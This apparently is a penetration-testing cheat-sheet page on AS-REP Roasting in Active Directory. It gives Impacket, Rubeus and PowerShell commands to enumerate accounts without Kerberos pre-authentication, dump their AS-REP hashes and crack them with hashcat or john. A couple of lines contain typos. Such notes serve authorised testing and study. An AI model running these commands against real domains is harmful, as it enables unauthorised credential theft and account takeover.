Elite

AS-REP Roasting

ASREPRoast

If a user's UserAccountControl settings have "Do not require Kerberos pre-authentication" enabled, i.e., Kerberos auth disabled, it is possible to grab the user's crackable AS-REP and brute-force it offline.

Linux

#WithOut User
impacket-GetNPUsers  jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Using User
impacket-GetNPUsers jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

Crack using hashcat Or john

Windows

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

Enumeration

Get-NetUser -PreauthNotRequired 
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True}

Powershell script to know users have weak config (Don't req preAuth)

preAuthRoasting.ps1
$strFilter = “(&(objectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=4194304))”
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
$objSearcher.Filter = $strFilter
$objSearcher.SearchScope = “Subtree”
$colProplist = “name”
foreach ($I in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$colResults = $objSearcher.FindAll()
$colResults | Format-Table
#Use ASREPRoast
powershell.exe -ep bypass
import-moudle .\preAuthRoasting.ps1
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Domain wargrey.mon -Server 192.168.1.50 | select -expand Hash

Impacket

impacket-GetNPUsers hacktor.local/ -usersfile <userfile> -dc-ip 192.168.1.50
john --wordlist=words.txt hash.txt

impacket-GetNPUsers services.local/ -usersfile users.txt -request -format hashcat -outputfile asreproast.txt -dc-ip 10.10.175.105 
#crack Using John
#windows env
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
#Linux env
john --wordlist=/usr/shere/wordlists/rockyou hash.txt 
#OR https://hashcat.net/wiki/doku.php?id=<Algo-Number>
hashcat -m <Algo-Number> hash.txt /usr/share/wordlists/rockyou.txt --show

Resources

PreviousKerberos brute-forceNextKerberoasting

Last updated